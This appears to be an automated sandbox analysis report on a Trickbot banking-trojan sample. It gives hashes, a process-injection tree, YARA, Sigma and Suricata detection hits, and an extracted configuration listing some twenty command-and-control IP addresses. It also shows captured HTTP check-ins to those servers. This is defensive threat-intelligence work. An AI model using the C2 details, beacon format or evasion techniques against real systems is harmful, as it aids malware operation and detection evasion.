Edit tour

Windows Analysis Report
55ryoipjfdr.exe

Overview

General Information

Sample name:	55ryoipjfdr.exe
Analysis ID:	1592535
MD5:	f0b9f50c6a247ac5ca9cc95135b83dcf
SHA1:	c1b276883da10fa2bf1c37a3851781e5c702a601
SHA256:	068af8016c36fce5cf1e1a4722c1dc0d6e02cb6ed58b61c2ba99a54d294cc274
Tags:	exemalwareRansomwareuser-Joker
Infos:

Detection

Trickbot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Detected Trickbot e-Banking trojan config

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Trickbot

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Hijacks the control flow in another process

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Switches to a custom stack to bypass stack traces

Writes to foreign memory regions

Yara detected PersistenceViaHiddenTask

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to query network adapater information

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May check the online IP address of the machine

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Yara signature match

Classification

Process Tree

System is w10x64

55ryoipjfdr.exe (PID: 7708 cmdline: "C:\Users\user\Desktop\55ryoipjfdr.exe" MD5: F0B9F50C6A247AC5CA9CC95135B83DCF)

44qxnhoiecq.exe (PID: 8020 cmdline: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe MD5: F0B9F50C6A247AC5CA9CC95135B83DCF)

svchost.exe (PID: 1984 cmdline: svchost.exe -k netsvcs MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

44qxnhoiecq.exe (PID: 7308 cmdline: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe MD5: F0B9F50C6A247AC5CA9CC95135B83DCF)

svchost.exe (PID: 5496 cmdline: svchost.exe -k netsvcs MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
TrickBot	A financial Trojan believed to be a derivative of Dyre: the bot uses very similar code, web injects, and operational tactics. Has multiple modules including VNC and Socks5 Proxy. Uses SSL for C2 communication.- Q4 2016 - Detected in wildOct 2016 - 1st Report2017 - Trickbot primarily uses Necurs as vehicle for installs.Jan 2018 - Use XMRIG (Monero) minerFeb 2018 - Theft BitcoinMar 2018 - Unfinished ransomware moduleQ3/4 2018 - Trickbot starts being spread through Emotet.Infection Vector1. Phish > Link MS Office > Macro Enabled > Downloader > Trickbot2. Phish > Attached MS Office > Macro Enabled > Downloader > Trickbot3. Phish > Attached MS Office > Macro enabled > Trickbot installed	TA505 UNC1878 WIZARD SPIDER	http://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot http://www.malware-traffic-analysis.net/2018/02/01/ http://www.peppermalware.com/2019/03/quick-analysis-of-trickbot-sample-with.html http://www.pwc.co.uk/issues/cyber-security-data-privacy/research/trickbots-bag-of-tricks.html http://www.secureworks.com/research/threat-profiles/gold-blackburn	https://malpedia.caad.fkie.fraunhofer.de/details/win.trickbot

Malware Configuration

Threatname: Trickbot

{"ver": "1000047", "gtag": "mac1", "servs": ["91.83.88.51:449", "193.19.118.207:443", "185.15.245.102:443", "185.15.245.103:443", "199.48.160.60:443", "195.133.48.80:443", "147.135.196.128:443", "194.87.95.120:443", "194.87.99.62:443", "194.87.239.114:443", "94.242.224.218:443", "195.133.147.135:443", "185.158.113.62:443", "194.87.146.180:443", "194.87.99.220:443", "194.87.95.122:443", "194.87.111.6:443", "195.133.197.187:443", "194.87.99.210:443", "169.239.129.42:443", "178.156.202.97:443"], "ecc_key": "RUNTMzAAAADzIIbbIE3wcze1+xiwwK+Au/P78UrAO8YAHyPvHEwGVKOPphl8QVfrC7x/QaFYeXANw6E4HF7ietEp+7ZVQdWOx8c+HvO0Z2PTUPVbX9HAVrg4h9u1RNfhOHk+YysDLsg="}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp	Windows_Trojan_Trickbot_01365e46	unknown	unknown	0x69d8:$a: 8B 43 28 4C 8B 53 18 4C 8B 5B 10 4C 8B 03 4C 8B 4B 08 89 44 24 38 48 89 4C 24 30 4C
00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp	Windows_Trojan_Trickbot_01365e46	unknown	unknown	0x69d8:$a: 8B 43 28 4C 8B 53 18 4C 8B 5B 10 4C 8B 03 4C 8B 4B 08 89 44 24 38 48 89 4C 24 30 4C
00000008.00000002.2671214706.00000159F3602000.00000004.00000020.00020000.00000000.sdmp	Trickbot	detect TrickBot in memory	JPCERT/CC Incident Response Group	0xaed2:$tagm1: <mcconf><ver> 0x9480:$tagm2: </autorun></mcconf> 0xb4a2:$tagm2: </autorun></mcconf>
00000008.00000002.2670443907.00000159F2A13000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PersistenceViaHiddenTask	Yara detected PersistenceViaHiddenTask	Joe Security
00000008.00000002.2670443907.00000159F2A13000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Trickbot_1	Yara detected Trickbot	Joe Security
00000008.00000002.2670443907.00000159F2A13000.00000004.00000020.00020000.00000000.sdmp	Trickbot	detect TrickBot in memory	JPCERT/CC Incident Response Group	0x18098:$tagm1: <mcconf><ver> 0x18668:$tagm2: </autorun></mcconf>
00000006.00000002.2121935863.000001DD0F013000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PersistenceViaHiddenTask	Yara detected PersistenceViaHiddenTask	Joe Security
00000003.00000002.2121898954.000000000057E000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Trickbot_01365e46	unknown	unknown	0x1d6d0:$a: 8B 43 28 4C 8B 53 18 4C 8B 5B 10 4C 8B 03 4C 8B 4B 08 89 44 24 38 48 89 4C 24 30 4C
00000007.00000002.2462776816.0000000000768000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Trickbot_01365e46	unknown	unknown	0x17d80:$a: 8B 43 28 4C 8B 53 18 4C 8B 5B 10 4C 8B 03 4C 8B 4B 08 89 44 24 38 48 89 4C 24 30 4C
Process Memory Space: svchost.exe PID: 1984	JoeSecurity_PersistenceViaHiddenTask	Yara detected PersistenceViaHiddenTask	Joe Security
Process Memory Space: svchost.exe PID: 5496	JoeSecurity_PersistenceViaHiddenTask	Yara detected PersistenceViaHiddenTask	Joe Security
Process Memory Space: svchost.exe PID: 5496	JoeSecurity_Trickbot_1	Yara detected Trickbot	Joe Security
Click to see the 7 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
6.2.svchost.exe.140000000.0.unpack	Windows_Trojan_Trickbot_01365e46	unknown	unknown	0x6dd8:$a: 8B 43 28 4C 8B 53 18 4C 8B 5B 10 4C 8B 03 4C 8B 4B 08 89 44 24 38 48 89 4C 24 30 4C
8.2.svchost.exe.140000000.0.unpack	Windows_Trojan_Trickbot_01365e46	unknown	unknown	0x6dd8:$a: 8B 43 28 4C 8B 53 18 4C 8B 5B 10 4C 8B 03 4C 8B 4B 08 89 44 24 38 48 89 4C 24 30 4C

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: svchost.exe -k netsvcs, CommandLine: svchost.exe -k netsvcs, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe, ParentImage: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe, ParentProcessId: 8020, ParentProcessName: 44qxnhoiecq.exe, ProcessCommandLine: svchost.exe -k netsvcs, ProcessId: 1984, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: svchost.exe -k netsvcs, CommandLine: svchost.exe -k netsvcs, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe, ParentImage: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe, ParentProcessId: 8020, ParentProcessName: 44qxnhoiecq.exe, ProcessCommandLine: svchost.exe -k netsvcs, ProcessId: 1984, ProcessName: svchost.exe

Suricata Signatures

ETPRO MALWARE Win32/TrickBot CnC Initial Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-16T09:10:55.439247+0100	2838349	1	Malware Command and Control Activity Detected	192.168.2.8	49713	194.87.99.210	443	TCP
2025-01-16T09:10:56.730422+0100	2838349	1	Malware Command and Control Activity Detected	192.168.2.8	49714	194.87.99.210	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 55ryoipjfdr.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe

Avira: detection malicious, Label: HEUR/AGEN.1315497

Found malware configuration

Source: 6.2.svchost.exe.140000000.0.unpack

Malware Configuration Extractor: Trickbot {"ver": "1000047", "gtag": "mac1", "servs": ["91.83.88.51:449", "193.19.118.207:443", "185.15.245.102:443", "185.15.245.103:443", "199.48.160.60:443", "195.133.48.80:443", "147.135.196.128:443", "194.87.95.120:443", "194.87.99.62:443", "194.87.239.114:443", "94.242.224.218:443", "195.133.147.135:443", "185.158.113.62:443", "194.87.146.180:443", "194.87.99.220:443", "194.87.95.122:443", "194.87.111.6:443", "195.133.197.187:443", "194.87.99.210:443", "169.239.129.42:443", "178.156.202.97:443"], "ecc_key": "RUNTMzAAAADzIIbbIE3wcze1+xiwwK+Au/P78UrAO8YAHyPvHEwGVKOPphl8QVfrC7x/QaFYeXANw6E4HF7ietEp+7ZVQdWOx8c+HvO0Z2PTUPVbX9HAVrg4h9u1RNfhOHk+YysDLsg="}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe

ReversingLabs: Detection: 94%

Multi AV Scanner detection for submitted file

Source: 55ryoipjfdr.exe	Virustotal: Detection: 90%			Perma Link
Source: 55ryoipjfdr.exe	ReversingLabs: Detection: 94%

Yara detected Trickbot

Source: Yara match	File source: 00000008.00000002.2670443907.00000159F2A13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 5496, type: MEMORYSTR

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 55ryoipjfdr.exe

Joe Sandbox ML: detected

Source: C:\Windows\System32\svchost.exe	Code function: 6_2_0000000140007340 memcpy,HeapFree,CryptReleaseContext,	6_2_0000000140007340
Source: C:\Windows\System32\svchost.exe	Code function: 6_2_0000000140006FB0 HeapFree,CryptReleaseContext,	6_2_0000000140006FB0
Source: C:\Windows\System32\svchost.exe	Code function: 8_2_0000000140006FB0 HeapFree,CryptReleaseContext,	8_2_0000000140006FB0
Source: C:\Windows\System32\svchost.exe	Code function: 8_2_0000000140007340 memcpy,HeapFree,CryptReleaseContext,	8_2_0000000140007340

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\55ryoipjfdr.exe	Unpacked PE file: 0.2.55ryoipjfdr.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Unpacked PE file: 3.2.44qxnhoiecq.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Unpacked PE file: 7.2.44qxnhoiecq.exe.400000.0.unpack

Source: 55ryoipjfdr.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 194.87.99.210:443 -> 192.168.2.8:49713 version: TLS 1.2

Source: C:\Windows\System32\svchost.exe

Code function: 8_2_000000014000D0F0 HeapFree,HeapFree,FindFirstFileW,HeapFree,HeapFree,FindNextFileW,GetLastError,

8_2_000000014000D0F0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2838349 - Severity 1 - ETPRO MALWARE Win32/TrickBot CnC Initial Checkin : 192.168.2.8:49714 -> 194.87.99.210:443
Source: Network traffic	Suricata IDS: 2838349 - Severity 1 - ETPRO MALWARE Win32/TrickBot CnC Initial Checkin : 192.168.2.8:49713 -> 194.87.99.210:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	IPs: 91.83.88.51:449
Source: Malware configuration extractor	IPs: 193.19.118.207:443
Source: Malware configuration extractor	IPs: 185.15.245.102:443
Source: Malware configuration extractor	IPs: 185.15.245.103:443
Source: Malware configuration extractor	IPs: 199.48.160.60:443
Source: Malware configuration extractor	IPs: 195.133.48.80:443
Source: Malware configuration extractor	IPs: 147.135.196.128:443
Source: Malware configuration extractor	IPs: 194.87.95.120:443
Source: Malware configuration extractor	IPs: 194.87.99.62:443
Source: Malware configuration extractor	IPs: 194.87.239.114:443
Source: Malware configuration extractor	IPs: 94.242.224.218:443
Source: Malware configuration extractor	IPs: 195.133.147.135:443
Source: Malware configuration extractor	IPs: 185.158.113.62:443
Source: Malware configuration extractor	IPs: 194.87.146.180:443
Source: Malware configuration extractor	IPs: 194.87.99.220:443
Source: Malware configuration extractor	IPs: 194.87.95.122:443
Source: Malware configuration extractor	IPs: 194.87.111.6:443
Source: Malware configuration extractor	IPs: 195.133.197.187:443
Source: Malware configuration extractor	IPs: 194.87.99.210:443
Source: Malware configuration extractor	IPs: 169.239.129.42:443
Source: Malware configuration extractor	IPs: 178.156.202.97:443

Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205

Source: Joe Sandbox View	ASN Name: SERVIHOSTING-ASAireNetworksES SERVIHOSTING-ASAireNetworksES
Source: Joe Sandbox View	ASN Name: MTW-ASRU MTW-ASRU

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: global traffic	HTTP traffic detected: GET /mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/ HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36Host: 194.87.99.210
Source: global traffic	HTTP traffic detected: GET /mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/ HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36Host: 194.87.99.210
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36Host: api.ipify.org

Source: unknown	TCP traffic detected without corresponding DNS query: 194.87.99.210
Source: unknown	TCP traffic detected without corresponding DNS query: 194.87.99.210
Source: unknown	TCP traffic detected without corresponding DNS query: 194.87.99.210
Source: unknown	TCP traffic detected without corresponding DNS query: 194.87.99.210
Source: unknown	TCP traffic detected without corresponding DNS query: 194.87.99.210
Source: unknown	TCP traffic detected without corresponding DNS query: 194.87.99.210
Source: unknown	TCP traffic detected without corresponding DNS query: 194.87.99.210
Source: unknown	TCP traffic detected without corresponding DNS query: 194.87.99.210
Source: unknown	TCP traffic detected without corresponding DNS query: 194.87.99.210
Source: unknown	TCP traffic detected without corresponding DNS query: 194.87.99.210
Source: unknown	TCP traffic detected without corresponding DNS query: 194.87.99.210
Source: unknown	TCP traffic detected without corresponding DNS query: 194.87.99.210
Source: unknown	TCP traffic detected without corresponding DNS query: 194.87.99.210
Source: unknown	TCP traffic detected without corresponding DNS query: 194.87.99.210
Source: unknown	TCP traffic detected without corresponding DNS query: 194.87.99.210
Source: unknown	TCP traffic detected without corresponding DNS query: 194.87.95.122
Source: unknown	TCP traffic detected without corresponding DNS query: 194.87.95.122
Source: unknown	TCP traffic detected without corresponding DNS query: 194.87.95.122
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/ HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36Host: 194.87.99.210
Source: global traffic	HTTP traffic detected: GET /mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/ HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36Host: 194.87.99.210
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36Host: api.ipify.org

Source: global traffic

DNS traffic detected: DNS query: api.ipify.org

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Date: Thu, 16 Jan 2025 08:10:55 GMTContent-Type: text/htmlContent-Length: 564Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0 (Ubuntu)Date: Thu, 16 Jan 2025 08:10:56 GMTContent-Type: text/htmlContent-Length: 564Connection: close

Source: svchost.exe, 00000008.00000002.2670888110.00000159F2AFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://194.87.95.122/
Source: svchost.exe, 00000008.00000002.2670748747.00000159F2A84000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2671363412.00000159F3716000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://194.87.95.122/mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/
Source: svchost.exe, 00000008.00000002.2670835827.00000159F2AB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://194.87.95.122/mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/H
Source: svchost.exe, 00000008.00000002.2671346385.00000159F3706000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://194.87.95.122:443/mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/
Source: svchost.exe, 00000008.00000002.2670888110.00000159F2AEA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2670888110.00000159F2AFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://194.87.99.210/
Source: svchost.exe, 00000008.00000002.2670748747.00000159F2A84000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2670682517.00000159F2A71000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2671363412.00000159F3716000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://194.87.99.210/mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/
Source: svchost.exe, 00000008.00000002.2670682517.00000159F2A71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://194.87.99.210/mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/u
Source: svchost.exe, 00000008.00000002.2671346385.00000159F3706000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://194.87.99.210:443/mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/
Source: svchost.exe, 00000008.00000002.2670621225.00000159F2A57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://194.87.99.210:443/mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/pD

Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713

Source: unknown

HTTPS traffic detected: 194.87.99.210:443 -> 192.168.2.8:49713 version: TLS 1.2

E-Banking Fraud

Detected Trickbot e-Banking trojan config

Source: svchost.exe, 00000008.00000002.2670443907.00000159F2A13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: <mcconf><ver>1000047</ver><gtag>mac1</gtag><servs><srv>91.83.88.51:449</srv><srv>193.19.118.207:443</srv><srv>185.15.245.102:443</srv><srv>185.15.245.103:443</srv><srv>199.48.160.60:443</srv><srv>195.133.48.80:443</srv><srv>147.135.196.128:443</srv><srv>194.87.95.120:443</srv><srv>194.87.99.62:443</srv><srv>194.87.239.114:443</srv><srv>94.242.224.218:443</srv><srv>195.133.147.135:443</srv><srv>185.158.113.62:443</srv><srv>194.87.146.180:443</srv><srv>194.87.99.220:443</srv><srv>194.87.95.122:443</srv><srv>194.87.111.6:443</srv><srv>195.133.197.187:443</srv><srv>194.87.99.210:443</srv><srv>169.239.129.42:443</srv><srv>178.156.202.97:443</srv></servs><autorun><module name="systeminfo" ctl="GetSystemInfo"/><module name="testnewinj3Dll"/></autorun></mcconf>pe>InteractiveToken</LogonType>
Source: svchost.exe, 00000008.00000002.2671214706.00000159F3602000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: <mcconf><ver>1000047</ver><gtag>mac1</gtag><servs><srv>91.83.88.51:449</srv><srv>193.19.118.207:443</srv><srv>185.15.245.102:443</srv><srv>185.15.245.103:443</srv><srv>199.48.160.60:443</srv><srv>195.133.48.80:443</srv><srv>147.135.196.128:443</srv><srv>194.87.95.120:443</srv><srv>194.87.99.62:443</srv><srv>194.87.239.114:443</srv><srv>94.242.224.218:443</srv><srv>195.133.147.135:443</srv><srv>185.158.113.62:443</srv><srv>194.87.146.180:443</srv><srv>194.87.99.220:443</srv><srv>194.87.95.122:443</srv><srv>194.87.111.6:443</srv><srv>195.133.197.187:443</srv><srv>194.87.99.210:443</srv><srv>169.239.129.42:443</srv><srv>178.156.202.97:443</srv></servs><autorun><module name="systeminfo" ctl="GetSystemInfo"/><module name="testnewinj3Dll"/></autorun></mcconf>

Yara detected Trickbot

Source: Yara match	File source: 00000008.00000002.2670443907.00000159F2A13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 5496, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 6.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Trickbot_01365e46 Author: unknown
Source: 8.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Trickbot_01365e46 Author: unknown
Source: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Trickbot_01365e46 Author: unknown
Source: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Trickbot_01365e46 Author: unknown
Source: 00000008.00000002.2671214706.00000159F3602000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect TrickBot in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.2670443907.00000159F2A13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect TrickBot in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.2121898954.000000000057E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Trickbot_01365e46 Author: unknown
Source: 00000007.00000002.2462776816.0000000000768000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Trickbot_01365e46 Author: unknown

Source: C:\Users\user\Desktop\55ryoipjfdr.exe	Code function: 0_2_00401A00 GetCurrentProcess,LoadLibraryA,GetProcAddress,NtQueryInformationProcess,	0_2_00401A00
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Code function: 3_3_10001A20 EntryPoint,NtClose,NtClose,	3_3_10001A20
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Code function: 3_3_10001920 NtAllocateVirtualMemory,NtWriteVirtualMemory,NtFreeVirtualMemory,	3_3_10001920
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Code function: 3_3_10003220 NtReadVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtClearEvent,NtSignalAndWaitForSingleObject,NtReadVirtualMemory,NtFreeVirtualMemory,NtFreeVirtualMemory,	3_3_10003220
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Code function: 3_3_10001830 NtAllocateVirtualMemory,	3_3_10001830
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Code function: 3_3_10002CB0 MultiByteToWideChar,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,LdrLoadDll,NtReadVirtualMemory,NtFreeVirtualMemory,	3_3_10002CB0
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Code function: 3_3_100018C0 NtProtectVirtualMemory,	3_3_100018C0
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Code function: 3_3_100017D0 NtWriteVirtualMemory,	3_3_100017D0
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Code function: 3_3_10001AE0 NtCreateEvent,NtCreateEvent,NtDuplicateObject,NtDuplicateObject,NtSignalAndWaitForSingleObject,NtClose,NtClearEvent,NtWriteVirtualMemory,NtClearEvent,NtClearEvent,NtResumeThread,NtSignalAndWaitForSingleObject,NtClose,NtClose,NtDuplicateObject,NtDuplicateObject,NtFreeVirtualMemory,NtFreeVirtualMemory,	3_3_10001AE0
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Code function: 3_3_10002F60 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,LdrGetProcedureAddress,NtReadVirtualMemory,NtFreeVirtualMemory,	3_3_10002F60
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Code function: 3_3_100015F0 NtQueryInformationProcess,NtReadVirtualMemory,NtReadVirtualMemory,NtReadVirtualMemory,	3_3_100015F0
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Code function: 3_3_10003470 NtReadVirtualMemory,NtWriteVirtualMemory,NtClearEvent,NtSignalAndWaitForSingleObject,NtReadVirtualMemory,	3_3_10003470
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Code function: 3_3_10001FF0 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,NtFreeVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtQueryInformationProcess,NtWriteVirtualMemory,NtReadVirtualMemory,NtReadVirtualMemory,NtReadVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtFreeVirtualMemory,	3_3_10001FF0
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Code function: 3_3_10001880 NtFreeVirtualMemory,	3_3_10001880
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Code function: 3_3_10001E70 NtReadVirtualMemory,NtWriteVirtualMemory,NtSignalAndWaitForSingleObject,NtReadVirtualMemory,NtSignalAndWaitForSingleObject,NtClose,NtClose,	3_3_10001E70
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Code function: 7_3_10001A20 EntryPoint,NtClose,NtClose,	7_3_10001A20
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Code function: 7_3_10001920 NtAllocateVirtualMemory,NtWriteVirtualMemory,NtFreeVirtualMemory,	7_3_10001920
